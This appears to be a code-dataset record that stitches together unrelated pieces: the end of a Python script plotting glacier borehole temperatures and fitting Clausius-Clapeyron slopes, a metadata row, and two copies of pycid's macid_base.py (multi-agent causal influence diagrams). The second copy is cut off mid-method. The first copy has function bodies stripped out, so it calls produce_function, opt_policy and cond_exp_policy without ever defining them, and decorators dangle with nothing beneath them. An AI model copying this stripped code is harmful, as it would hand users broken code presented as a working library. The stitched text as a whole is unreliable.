ax5a.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=0.8, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5a.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5a.scatter(x_scat, y_scat, s=20, facecolors='none', edgecolors='black', zorder=6, label='Thermistor data')
ax5a.invert_yaxis()
ax5a.set_xlim([-25, 2])
ax5a.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5a.set_xlabel("Temperature ($^\circ$C)")
ax5a.set_ylabel("Depth (m)")
ax5a.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5a.grid(True)
rect1 = patch.Rectangle((co_T1, co_d2), co_T2 - co_T1, co_d1 - co_d2, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect1)
rect2 = patch.Rectangle((-6, 880), 6.5, bh_depth - 880, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect2)
ax5c.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5c.plot(ds_end.tmpw, y, lw=1, label='Temperature', zorder=3, color='k')
ax5c.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5c.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5c.invert_yaxis()
ax5c.set_xlim([-6, -0.5]) #orig = [-25, 2], temp zone = [-1.5, -0.5]quit()
ax5c.set_ylim([bh_depth, 880]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5c.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5c.set_xlabel("Temperature ($^\circ$C)")
ax5c.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5c.grid(True)
#rect3 = patch.Rectangle((-0.95, bh_depth - 85), 0.3, bh_depth - 85, linewidth=1, facecolor='none', edgecolor = 'k')
#ax5c.add_patch(rect3)
#cut out
xspacing = 0.1
yspacing = 5
minorlocatorx = MultipleLocator(xspacing)
majorlocatory = MultipleLocator(yspacing)
ax5d = fig5.add_axes([0.225, 0.46, 0.1, 0.21])
ax5d.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=a, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5d.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5d.invert_yaxis()
ax5d.set_xlim([co_T1, co_T2])
ax5d.set_ylim([co_d2,co_d1]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5d.xaxis.set_minor_locator(minorlocatorx)
#ax5d.yaxis.set_minor_locator(majorlocatory)
ax5d.grid(which='major')
ax5d.grid(which='minor')
ax5e = fig5.add_axes([0.73, 0.15, 0.1, 0.43])
ax5e.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5e.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5e.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5e.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5e.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5e.invert_yaxis()
ax5e.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5e.set_xlim([-0.95, -0.65])
ax5e.set_ylim([bh_depth, bh_depth - 85]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5e.xaxis.set_minor_locator(minorlocatorx)
ax5e.yaxis.set_minor_locator(majorlocatory)
ax5e.grid(which='major')
ax5e.grid(which='minor')
#fig5.savefig('figures/T_profile_mean4.png', dpi=600, bbox_inches = 'tight', format = 'png')
plt.show()
#plt.close('all')
#save outdatacd
data_out = np.column_stack((y, ds_end.tmpw))
#np.savetxt('results/T_profile.txt', data_out)
#clausius clapeyron calculation for each time step
sys.exit()
y_2 = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values #introducing second y cut to region of interest
#for loop to run over area within temperate zone and calculate clausius clapeyron slope and goodness of fit
#create output array
rms_out = np.zeros(len(t)) #store root mean square error
r2_out = np.zeros(len(t)) #r squared value
cc_out = np.zeros(len(t)) #store Clausius Clapeyron
#get index where passes inferred CTZ
t_zone_top = [ n for n,i in enumerate(y_2) if i>982 ][0]
for i in range(len(t)):
#prepare regression inputs
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
T_full = np.squeeze(T[:,i])
t_zone_ind = np.squeeze(pmp_ind[:,i])
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
#perform R2 regressoin
slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_t_zone, T_t_zone)
#print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
# '(rms residual = {:.4f})'.format(rms))
#pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
#pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
#pylab.xlabel('Temperature $^{o}C$')
#pylab.ylabel('Depth (m)')
#plt.gca().invert_yaxis()
#pylab.show()
#save outputs
rms_out[i] = rms
r2_out[i] = r_value**2
cc_out[i] = m #convert from K m-1 to K MPa-1
plt.plot(t, -0.8 - 1043*cc_out)
plt.show()
plt.plot(t, (-cc_out/(rho_ice*g))*1e6)
#plt.plot(t, (rms_out/(rho_ice*g))*1e6)
plt.show()
plt.plot(t, r2_out)
plt.show()
#seperate plots
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
T_full = np.squeeze(T[:,120])
t_zone_ind = np.squeeze(pmp_ind[:,120])
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
'(rms residual = {:.4f})'.format(rms))
pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
pylab.xlabel('Temperature $^{o}C$')
pylab.ylabel('Depth (m)')
plt.gca().invert_yaxis()
pylab.show()
| 172 | 0 | 23 |
4d372a822f3fd4bf37c1514539f86c1b3f30550b | 19,807 | py | Python | pycid/core/macid_base.py | sbenthall/pycid | 114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf | [
"Apache-2.0"
] | 1 | 2020-05-29T10:18:59.000Z | 2020-05-29T10:18:59.000Z | pycid/core/macid_base.py | sbenthall/pycid | 114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf | [
"Apache-2.0"
] | 2 | 2020-06-07T09:37:40.000Z | 2020-08-06T23:15:54.000Z | pycid/core/macid_base.py | sbenthall/pycid | 114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf | [
"Apache-2.0"
] | 2 | 2020-05-28T16:35:11.000Z | 2020-05-28T16:39:05.000Z | from __future__ import annotations
import itertools
import math
from functools import lru_cache
from typing import (
Any,
Callable,
Collection,
Dict,
Hashable,
Iterable,
Iterator,
KeysView,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from warnings import warn
import matplotlib.cm as cm
import networkx as nx
import numpy as np
from pgmpy.factors.discrete import TabularCPD
from pgmpy.inference.ExactInference import BeliefPropagation
from pycid.core.causal_bayesian_network import CausalBayesianNetwork, Relationship
from pycid.core.cpd import DecisionDomain, Outcome, StochasticFunctionCPD
from pycid.core.relevance_graph import RelevanceGraph
AgentLabel = Hashable # Could be a TypeVar instead but that might be overkill
class MACIDBase(CausalBayesianNetwork):
"""Base structure of a Multi-Agent Causal Influence Diagram.
Attributes
----------
agent_decisions: The decision nodes of each agent.
A dictionary mapping agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A dictionary mapping agent label => node labels.
decision_agent: The agent owner of each decision node.
A dictionary mapping decision node label => agent label.
utility_agent: The agent owner of each utility node.
A dictionary mapping utility node label => agent label.
"""
def __init__(
self,
edges: Iterable[Tuple[str, str]] = None,
agent_decisions: Mapping[AgentLabel, List[str]] = None,
agent_utilities: Mapping[AgentLabel, List[str]] = None,
**kwargs: Any,
):
"""Initialize a new MACIDBase instance.
Parameters
----------
edges: A set of directed edges. Each is a pair of node labels (tail, head).
agent_decisions: The decision nodes of each agent.
A mapping of agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A mapping of agent label => node labels.
"""
super().__init__(edges=edges, **kwargs)
self.agent_decisions = dict(agent_decisions) if agent_decisions else {}
self.agent_utilities = dict(agent_utilities) if agent_utilities else {}
self.decision_agent = {node: agent for agent, nodes in self.agent_decisions.items() for node in nodes}
self.utility_agent = {node: agent for agent, nodes in self.agent_utilities.items() for node in nodes}
@property
def decisions(self) -> KeysView[str]:
"""The set of all decision nodes"""
return self.decision_agent.keys()
@property
def utilities(self) -> KeysView[str]:
"""The set of all utility nodes"""
return self.utility_agent.keys()
@property
def agents(self) -> KeysView[AgentLabel]:
"""The set of all agents"""
return self.agent_utilities.keys()
def make_decision(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node.
- agent specifies which agent the decision node should belong to in a MACID.
"""
self.make_chance(node)
if agent not in self.agent_decisions:
self.agent_decisions[agent] = [node]
else:
self.agent_decisions[agent].append(node)
self.decision_agent[node] = agent
def make_utility(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node."""
self.make_chance(node)
if agent not in self.agent_utilities:
self.agent_utilities[agent] = [node]
else:
self.agent_utilities[agent].append(node)
self.utility_agent[node] = agent
def make_chance(self, node: str) -> None:
"""Turn a decision node into a chance node."""
if node not in self.nodes():
raise KeyError(f"The node {node} is not in the (MA)CID")
elif node in set(self.decisions):
agent = self.decision_agent.pop(node)
self.agent_decisions[agent].remove(node)
elif node in set(self.utilities):
agent = self.utility_agent.pop(node)
self.agent_utilities[agent].remove(node)
def query(
self, query: Iterable[str], context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None
) -> BeliefPropagation:
"""Return P(query|context, do(intervention))*P(context | do(intervention)).
Use factor.normalize to get p(query|context, do(intervention)).
Use context={} to get P(query).
Parameters
----------
query: A set of nodes to query.
context: Node values to condition upon. A dictionary mapping of node => outcome.
intervention: Interventions to apply. A dictionary mapping node => outcome.
"""
for variable, outcome in context.items():
if outcome not in self.get_cpds(variable).domain:
raise ValueError(f"The outcome {outcome} is not in the domain of {variable}")
intervention = intervention or {}
# Check that strategically relevant decisions have a policy specified
mech_graph = MechanismGraph(self)
for intervention_var in intervention:
for parent in self.get_parents(intervention_var):
mech_graph.remove_edge(parent, intervention_var)
for decision in self.decisions:
for query_node in query:
if mech_graph.is_dconnected(
decision + "mec", query_node, observed=list(context.keys()) + list(intervention.keys())
):
cpd = self.get_cpds(decision)
if not cpd:
raise ValueError(f"no DecisionDomain specified for {decision}")
elif isinstance(cpd, DecisionDomain):
raise ValueError(
f"P({query}|{context}, do({intervention})) depends on {decision}, but no policy imputed"
)
return super().query(query, context, intervention)
def expected_utility(
self, context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None, agent: AgentLabel = 0
) -> float:
"""Compute the expected utility of an agent for a given context and optional intervention
For example:
cid = get_minimal_cid()
out = self.expected_utility({'D':1}) #TODO: give example that uses context
Parameters
----------
context: Node values to condition upon. A dictionary mapping of node => value.
intervention: Interventions to apply. A dictionary mapping node => value.
agent: Evaluate the utility of this agent.
"""
return sum(self.expected_value(self.agent_utilities[agent], context, intervention=intervention))
def get_valid_order(self, nodes: Optional[Iterable[str]] = None) -> List[str]:
"""Get a topological order of the specified set of nodes (this may not be unique).
By default, a topological ordering of the decision nodes is given"""
if not nx.is_directed_acyclic_graph(self):
raise ValueError("A topological ordering of nodes can only be returned if the (MA)CID is acyclic")
if nodes is None:
nodes = self.decisions
else:
nodes = set(nodes)
for node in nodes:
if node not in self.nodes:
raise KeyError(f"{node} is not in the (MA)CID.")
srt = [node for node in nx.topological_sort(self) if node in nodes]
return srt
def is_s_reachable(self, d1: Union[str, Iterable[str]], d2: Union[str, Iterable[str]]) -> bool:
"""
Determine whether 'D2' is s-reachable from 'D1' (Koller and Milch, 2001)
A node D2 is s-reachable from a node D1 in a MACID M if there is some utility node U ∈ U_D1 ∩ Desc(D1)
such that if a new parent D2' were added to D2, there would be an active path in M from
D2′ to U given Pa(D)∪{D}, where a path is active in a MAID if it is active in the same graph, viewed as a BN.
"""
assert d2 in self.decisions
return self.is_r_reachable(d1, d2)
def is_r_reachable(self, decisions: Union[str, Iterable[str]], nodes: Union[str, Iterable[str]]) -> bool:
"""
Determine whether (a set of) node(s) is r-reachable from decision in the (MA)CID.
- A node 𝑉 is r-reachable from a decision 𝐷 ∈ 𝑫^𝑖 in a MAID, M = (𝑵, 𝑽, 𝑬),
if a newly added parent 𝑉ˆ of 𝑉 satisfies 𝑉ˆ ̸⊥ 𝑼^𝑖 ∩ Desc_𝐷 | Fa_𝐷 .
- If a node V is r-reachable from a decision D that means D strategically or probabilisticaly relies on V.
"""
if isinstance(decisions, str):
decisions = [decisions]
if isinstance(nodes, str):
nodes = [nodes]
mg = MechanismGraph(self)
for decision in decisions:
for node in nodes:
con_nodes = [decision] + self.get_parents(decision)
agent_utilities = self.agent_utilities[self.decision_agent[decision]]
for utility in set(agent_utilities).intersection(nx.descendants(self, decision)):
if mg.is_dconnected(node + "mec", utility, con_nodes):
return True
return False
def sufficient_recall(self, agent: Optional[AgentLabel] = None) -> bool:
"""
Returns true if the agent has sufficient recall in the (MA)CID.
Agent i in the (MA)CID has sufficient recall if the relevance graph
restricted to contain only i's decision nodes is acyclic.
If an agent is specified, sufficient recall is checked only for that agent.
Otherwise, the check is done for all agents.
"""
if agent is None:
agents: Collection = self.agents
elif agent not in self.agents:
raise ValueError(f"There is no agent {agent}, in this (MA)CID")
else:
agents = [agent]
for a in agents:
rg = RelevanceGraph(self, self.agent_decisions[a])
if not rg.is_acyclic():
return False
return True
def pure_decision_rules(self, decision: str) -> Iterator[StochasticFunctionCPD]:
"""Return a list of the decision rules available at the given decision"""
domain = self.model.domain[decision]
parents = self.get_parents(decision)
parent_cardinalities = [self.get_cardinality(parent) for parent in parents]
# We begin by representing each possible decision rule as a tuple of outcomes, with
# one element for each possible decision context
number_of_decision_contexts = int(np.product(parent_cardinalities))
functions_as_tuples = itertools.product(domain, repeat=number_of_decision_contexts)
def arg2idx(pv: Dict[str, Outcome]) -> int:
"""Convert a decision context into an index for the function list"""
idx = 0
for i, parent in enumerate(parents):
name_to_no: Dict[Outcome, int] = self.get_cpds(parent).name_to_no[parent]
idx += name_to_no[pv[parent]] * int(np.product(parent_cardinalities[:i]))
assert 0 <= idx <= number_of_decision_contexts
return idx
for func_list in functions_as_tuples:
yield StochasticFunctionCPD(decision, produce_function(), self, domain=domain)
def pure_policies(self, decision_nodes: Iterable[str]) -> Iterator[Tuple[StochasticFunctionCPD, ...]]:
"""
Iterate over all of an agent's pure policies in this subgame.
"""
possible_dec_rules = list(map(self.pure_decision_rules, decision_nodes))
return itertools.product(*possible_dec_rules)
def optimal_pure_policies(
self, decisions: Iterable[str], rel_tol: float = 1e-9
) -> List[Tuple[StochasticFunctionCPD, ...]]:
"""Find all optimal policies for a given set of decisions.
- All decisions must belong to the same agent.
- rel_tol: is the relative tolerance. It is the amount of error allowed, relative to the larger
absolute value of the two values it is comparing (the two utilities.)
"""
if not decisions:
return []
decisions = set(decisions)
try:
(agent,) = {self.decision_agent[d] for d in decisions}
except ValueError:
raise ValueError("Decisions not all from the same agent")
macid = self.copy()
for d in macid.decisions:
if (
isinstance(macid.get_cpds(d), DecisionDomain)
and not macid.is_s_reachable(decisions, d)
and d not in decisions
):
macid.impute_random_decision(d)
optimal_policies = []
max_utility = float("-inf")
for policy in macid.pure_policies(decisions):
macid.add_cpds(*policy)
expected_utility = macid.expected_utility({}, agent=agent)
if math.isclose(expected_utility, max_utility, rel_tol=rel_tol):
optimal_policies.append(policy)
elif expected_utility > max_utility:
optimal_policies = [policy]
max_utility = expected_utility
return optimal_policies
def optimal_pure_decision_rules(self, decision: str) -> List[StochasticFunctionCPD]:
"""
Return a list of all optimal pure decision rules for a given decision
"""
return [policy[0] for policy in self.optimal_pure_policies([decision])]
def impute_random_decision(self, d: str) -> None:
"""Impute a random policy to the given decision node"""
try:
domain = self.model.domain[d]
except KeyError:
raise ValueError(f"can't figure out domain for {d}, did you forget to specify DecisionDomain?")
else:
self.model[d] = StochasticFunctionCPD(
d, lambda **pv: {outcome: 1 / len(domain) for outcome in domain}, self, domain, label="random_decision"
)
def impute_fully_mixed_policy_profile(self) -> None:
"""Impute a fully mixed policy profile - ie a random decision rule to all decision nodes"""
for d in self.decisions:
self.impute_random_decision(d)
def remove_all_decision_rules(self) -> None:
"""Remove the decision rules from all decisions in the (MA)CID"""
for d in self.decisions:
self.model[d] = self.model.domain[d]
def impute_optimal_decision(self, decision: str) -> None:
"""Impute an optimal policy to the given decision node"""
# self.add_cpds(random.choice(self.optimal_pure_decision_rules(d)))
self.impute_random_decision(decision)
domain = self.model.domain[decision]
utility_nodes = self.agent_utilities[self.decision_agent[decision]]
descendant_utility_nodes = list(set(utility_nodes).intersection(nx.descendants(self, decision)))
copy = self.copy() # using a copy "freezes" the policy so it doesn't adapt to future interventions
@lru_cache(maxsize=1000)
self.add_cpds(StochasticFunctionCPD(decision, opt_policy, self, domain=domain, label="opt"))
def impute_conditional_expectation_decision(self, decision: str, y: str) -> None:
"""Imputes a policy for decision = the expectation of y conditioning on d's parents"""
# TODO: Move to analyze, as this is not really a core feature?
copy = self.copy()
@lru_cache(maxsize=1000)
self.add_cpds(**{decision: cond_exp_policy})
# Wrapper around DAG.active_trail_nodes to accept arbitrary iterables for observed.
# Really, DAG.active_trail_nodes should accept Sets, especially since it does
# inefficient membership checks on observed as a list.
def copy_without_cpds(self) -> MACIDBase:
"""copy the MACIDBase object without its CPDs"""
new = MACIDBase()
new.add_nodes_from(self.nodes)
new.add_edges_from(self.edges)
for agent in self.agents:
for decision in self.agent_decisions[agent]:
new.make_decision(decision, agent)
for utility in self.agent_utilities[agent]:
new.make_utility(utility, agent)
return new
def _get_color(self, node: str) -> Union[np.ndarray, str]:
"""
Assign a unique colour to each new agent's decision and utility nodes
"""
agents = list(self.agents)
colors = cm.rainbow(np.linspace(0, 1, len(agents)))
try:
agent = self.decision_agent[node]
except KeyError:
try:
agent = self.utility_agent[node]
except KeyError:
agent = None
if agent is not None:
color: np.ndarray = colors[[agents.index(agent)]]
return color
else:
return "lightgray" # chance node
class MechanismGraph(MACIDBase):
"""A mechanism graph has an extra parent node+"mec" for each node"""
| 41.437238 | 120 | 0.63003 | from __future__ import annotations
import itertools
import math
from functools import lru_cache
from typing import (
Any,
Callable,
Collection,
Dict,
Hashable,
Iterable,
Iterator,
KeysView,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from warnings import warn
import matplotlib.cm as cm
import networkx as nx
import numpy as np
from pgmpy.factors.discrete import TabularCPD
from pgmpy.inference.ExactInference import BeliefPropagation
from pycid.core.causal_bayesian_network import CausalBayesianNetwork, Relationship
from pycid.core.cpd import DecisionDomain, Outcome, StochasticFunctionCPD
from pycid.core.relevance_graph import RelevanceGraph
AgentLabel = Hashable # Could be a TypeVar instead but that might be overkill
class MACIDBase(CausalBayesianNetwork):
"""Base structure of a Multi-Agent Causal Influence Diagram.
Attributes
----------
agent_decisions: The decision nodes of each agent.
A dictionary mapping agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A dictionary mapping agent label => node labels.
decision_agent: The agent owner of each decision node.
A dictionary mapping decision node label => agent label.
utility_agent: The agent owner of each utility node.
A dictionary mapping utility node label => agent label.
"""
class Model(CausalBayesianNetwork.Model):
def __setitem__(self, variable: str, relationship: Union[Relationship, Sequence]) -> None:
if isinstance(relationship, (DecisionDomain, Sequence)) and variable not in self.cbn.decisions:
warn(f"adding DecisionDomain to non-decision node {variable}")
super().__setitem__(variable, relationship)
def to_tabular_cpd(self, variable: str, relationship: Union[Relationship, Sequence[Outcome]]) -> TabularCPD:
if isinstance(relationship, Sequence):
return DecisionDomain(variable, self.cbn, relationship)
else:
return super().to_tabular_cpd(variable, relationship)
def __init__(
self,
edges: Iterable[Tuple[str, str]] = None,
agent_decisions: Mapping[AgentLabel, List[str]] = None,
agent_utilities: Mapping[AgentLabel, List[str]] = None,
**kwargs: Any,
):
"""Initialize a new MACIDBase instance.
Parameters
----------
edges: A set of directed edges. Each is a pair of node labels (tail, head).
agent_decisions: The decision nodes of each agent.
A mapping of agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A mapping of agent label => node labels.
"""
super().__init__(edges=edges, **kwargs)
self.agent_decisions = dict(agent_decisions) if agent_decisions else {}
self.agent_utilities = dict(agent_utilities) if agent_utilities else {}
self.decision_agent = {node: agent for agent, nodes in self.agent_decisions.items() for node in nodes}
self.utility_agent = {node: agent for agent, nodes in self.agent_utilities.items() for node in nodes}
@property
def decisions(self) -> KeysView[str]:
"""The set of all decision nodes"""
return self.decision_agent.keys()
@property
def utilities(self) -> KeysView[str]:
"""The set of all utility nodes"""
return self.utility_agent.keys()
@property
def agents(self) -> KeysView[AgentLabel]:
"""The set of all agents"""
return self.agent_utilities.keys()
def make_decision(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node.
- agent specifies which agent the decision node should belong to in a MACID.
"""
self.make_chance(node)
if agent not in self.agent_decisions:
self.agent_decisions[agent] = [node]
else:
self.agent_decisions[agent].append(node)
self.decision_agent[node] = agent
def make_utility(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node."""
self.make_chance(node)
if agent not in self.agent_utilities:
self.agent_utilities[agent] = [node]
else:
self.agent_utilities[agent].append(node)
self.utility_agent[node] = agent
def make_chance(self, node: str) -> None:
"""Turn a decision node into a chance node."""
if node not in self.nodes():
raise KeyError(f"The node {node} is not in the (MA)CID")
elif node in set(self.decisions):
agent = self.decision_agent.pop(node)
self.agent_decisions[agent].remove(node)
elif node in set(self.utilities):
agent = self.utility_agent.pop(node)
self.agent_utilities[agent].remove(node)
def add_cpds(self, *cpds: TabularCPD, **relationships: Union[Relationship, List[Outcome]]) -> None:
super().add_cpds(*cpds, **relationships)
def query(
self, query: Iterable[str], context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None
) -> BeliefPropagation:
"""Return P(query|context, do(intervention))*P(context | do(intervention)).
Use factor.normalize to get p(query|context, do(intervention)).
Use context={} to get P(query).
Parameters
----------
query: A set of nodes to query.
context: Node values to condition upon. A dictionary mapping of node => outcome.
intervention: Interventions to apply. A dictionary mapping node => outcome.
"""
for variable, outcome in context.items():
if outcome not in self.get_cpds(variable).domain:
raise ValueError(f"The outcome {outcome} is not in the domain of {variable}")
intervention = intervention or {}
# Check that strategically relevant decisions have a policy specified
mech_graph = MechanismGraph(self)
for intervention_var in intervention:
for parent in self.get_parents(intervention_var):
mech_graph.remove_edge(parent, intervention_var)
for decision in self.decisions:
for query_node in query:
if mech_graph.is_dconnected(
decision + "mec", query_node, observed=list(context.keys()) + list(intervention.keys())
):
cpd = self.get_cpds(decision)
if not cpd:
raise ValueError(f"no DecisionDomain specified for {decision}")
elif isinstance(cpd, DecisionDomain):
raise ValueError(
f"P({query}|{context}, do({intervention})) depends on {decision}, but no policy imputed"
)
return super().query(query, context, intervention)
def expected_utility(
self, context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None, agent: AgentLabel = 0
) -> float:
"""Compute the expected utility of an agent for a given context and optional intervention
For example:
cid = get_minimal_cid()
out = self.expected_utility({'D':1}) #TODO: give example that uses context
Parameters
----------
context: Node values to condition upon. A dictionary mapping of node => value.
intervention: Interventions to apply. A dictionary mapping node => value.
agent: Evaluate the utility of this agent.
"""
return sum(self.expected_value(self.agent_utilities[agent], context, intervention=intervention))
def get_valid_order(self, nodes: Optional[Iterable[str]] = None) -> List[str]:
"""Get a topological order of the specified set of nodes (this may not be unique).
By default, a topological ordering of the decision nodes is given"""
if not nx.is_directed_acyclic_graph(self):
raise ValueError("A topological ordering of nodes can only be returned if the (MA)CID is acyclic")
if nodes is None:
nodes = self.decisions
else:
nodes = set(nodes)
for node in nodes:
if node not in self.nodes:
raise KeyError(f"{node} is not in the (MA)CID.")
srt = [node for node in nx.topological_sort(self) if node in nodes]
return srt
def is_s_reachable(self, d1: Union[str, Iterable[str]], d2: Union[str, Iterable[str]]) -> bool:
"""
Determine whether 'D2' is s-reachable from 'D1' (Koller and Milch, 2001)
A node D2 is s-reachable from a node D1 in a MACID M if there is some utility node U ∈ U_D1 ∩ Desc(D1)
such that if a new parent D2' were added to D2, there would be an active path in M from
D2′ to U given Pa(D)∪{D}, where a path is active in a MAID if it is active in the same graph, viewed as a BN.
"""
assert d2 in self.decisions
return self.is_r_reachable(d1, d2)
def is_r_reachable(self, decisions: Union[str, Iterable[str]], nodes: Union[str, Iterable[str]]) -> bool:
"""
Determine whether (a set of) node(s) is r-reachable from decision in the (MA)CID.
- A node 𝑉 is r-reachable from a decision 𝐷 ∈ 𝑫^𝑖 in a MAID, M = (𝑵, 𝑽, 𝑬),
if a newly added parent 𝑉ˆ of 𝑉 satisfies 𝑉ˆ ̸⊥ 𝑼^𝑖 ∩ Desc_𝐷 | Fa_𝐷 .
- If a node V is r-reachable from a decision D that means D strategically or probabilisticaly relies on V.
"""
if isinstance(decisions, str):
decisions = [decisions]
if isinstance(nodes, str):
nodes = [nodes]
mg = MechanismGraph(self)
for decision in decisions:
for node in nodes:
con_nodes = [decision] + self.get_parents(decision)
agent_utilities = self.agent_utilities[self.decision_agent[decision]]
for utility in set(agent_utilities).intersection(nx.descendants(self, decision)):
if mg.is_dconnected(node + "mec", utility, con_nodes):
return True
return False
def sufficient_recall(self, agent: Optional[AgentLabel] = None) -> bool:
"""
Returns true if the agent has sufficient recall in the (MA)CID.
Agent i in the (MA)CID has sufficient recall if the relevance graph
restricted to contain only i's decision nodes is acyclic.
If an agent is specified, sufficient recall is checked only for that agent.
Otherwise, the check is done for all agents.
"""
if agent is None:
agents: Collection = self.agents
elif agent not in self.agents:
raise ValueError(f"There is no agent {agent}, in this (MA)CID")
else:
agents = [agent]
for a in agents:
rg = RelevanceGraph(self, self.agent_decisions[a])
if not rg.is_acyclic():
return False
return True
def pure_decision_rules(self, decision: str) -> Iterator[StochasticFunctionCPD]:
"""Return a list of the decision rules available at the given decision"""
domain = self.model.domain[decision]
parents = self.get_parents(decision)
parent_cardinalities = [self.get_cardinality(parent) for parent in parents]
# We begin by representing each possible decision rule as a tuple of outcomes, with
# one element for each possible decision context
number_of_decision_contexts = int(np.product(parent_cardinalities))
functions_as_tuples = itertools.product(domain, repeat=number_of_decision_contexts)
def arg2idx(pv: Dict[str, Outcome]) -> int:
"""Convert a decision context into an index for the function list"""
idx = 0
for i, parent in enumerate(parents):
name_to_no: Dict[Outcome, int] = self.get_cpds(parent).name_to_no[parent]
idx += name_to_no[pv[parent]] * int(np.product(parent_cardinalities[:i]))
assert 0 <= idx <= number_of_decision_contexts
return idx
for func_list in functions_as_tuples:
def produce_function(early_eval_func_list: tuple = func_list) -> Callable:
# using a default argument is a trick to get func_list to evaluate early
return lambda **parent_values: early_eval_func_list[arg2idx(parent_values)]
yield StochasticFunctionCPD(decision, produce_function(), self, domain=domain)
def pure_policies(self, decision_nodes: Iterable[str]) -> Iterator[Tuple[StochasticFunctionCPD, ...]]:
"""
Iterate over all of an agent's pure policies in this subgame.
"""
possible_dec_rules = list(map(self.pure_decision_rules, decision_nodes))
return itertools.product(*possible_dec_rules)
def optimal_pure_policies(
self, decisions: Iterable[str], rel_tol: float = 1e-9
) -> List[Tuple[StochasticFunctionCPD, ...]]:
"""Find all optimal policies for a given set of decisions.
- All decisions must belong to the same agent.
- rel_tol: is the relative tolerance. It is the amount of error allowed, relative to the larger
absolute value of the two values it is comparing (the two utilities.)
"""
if not decisions:
return []
decisions = set(decisions)
try:
(agent,) = {self.decision_agent[d] for d in decisions}
except ValueError:
raise ValueError("Decisions not all from the same agent")
macid = self.copy()
for d in macid.decisions:
if (
isinstance(macid.get_cpds(d), DecisionDomain)
and not macid.is_s_reachable(decisions, d)
and d not in decisions
):
macid.impute_random_decision(d)
optimal_policies = []
max_utility = float("-inf")
for policy in macid.pure_policies(decisions):
macid.add_cpds(*policy)
